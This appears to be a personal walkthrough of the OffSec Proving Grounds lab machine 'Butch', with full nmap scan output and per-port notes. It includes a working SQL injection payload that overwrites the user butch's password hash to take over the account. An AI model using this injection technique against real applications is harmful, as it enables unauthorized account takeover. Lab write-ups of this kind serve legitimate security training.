butch
00 min
2025-3-27
Source
https://portal.offsec.com/labs/practice
Date
Mar 23, 2025 → Mar 23, 2025
Tag
Nmap
SQLI
Web Exploitation

192.168.140.63

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 01:10 EDT Nmap scan report for 192.168.140.63 Host is up (0.066s latency). Not shown: 65528 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 450/tcp open tserver 5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 26.52 seconds
└─# nmap -sU -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 01:10 EDT Nmap scan report for 192.168.140.63 Host is up (0.060s latency). All 65535 scanned ports on 192.168.140.63 are in ignored states. Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 26.80 seconds

Nmap 7.94SVN scan initiated Sun Mar 23 01:12:18 2025 as: /usr/lib/nmap/nmap -Pn -n -sC -sV -p- --open -oN nmap.txt 192.168.140.63

Nmap scan report for 192.168.140.63 Host is up (0.062s latency). Not shown: 65528 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 25/tcp open smtp Microsoft ESMTP 10.0.17763.1 | smtp-commands: butch Hello [192.168.45.175], TURN, SIZE 2097152, ETRN, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH TURN ETRN BDAT VRFY 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 450/tcp open http Microsoft IIS httpd 10.0 |http-server-header: Microsoft-IIS/10.0 | http-methods: | Potentially risky methods: TRACE |_http-title: Butch 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: butch; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2025-03-23T05:14:36 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done at Sun Mar 23 01:15:13 2025 -- 1 IP address (1 host up) scanned in 174.91 seconds

21

notion image
FTP are not allow anonymous login

139,445

notion image

450

notion image
notion image
After manual SQL injection testing, we discovered that this website is vulnerable to SQL injection.
notion image
notion image
See this web page to identify how sql injection was found out
'; update users set password_hash = '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8' where username = 'butch'--
we update the user butch’s password by above command
notion image
login
Check the link for other information
AuspiSec - Proving Grounds: Butch Walkthrough
I'm normally not one to post walkthroughs of practice machines, but this one is an exception mainly because the official OffSec walkthrough uses SQLmap, which is banned on the OSCP exam. That's not doing examinees any favors. As I did manage to hack this machine without the use of any banned tools, I wanted to share my thought processes with the community as I didn't see any other resources addressing all these points for this machine. I also came up with a slightly different .NET exploit than the official walkthrough. Hopefully those spoilers aren't too harmful. I'll address my thoughts on this machine more in the conclusion.
AuspiSec - Proving Grounds: Butch Walkthrough
https://auspisec.com/blog/20220118/proving_grounds_butch_walkthrough.html

5985

notion image
notion image
 
上一篇
HB
下一篇
AZ-900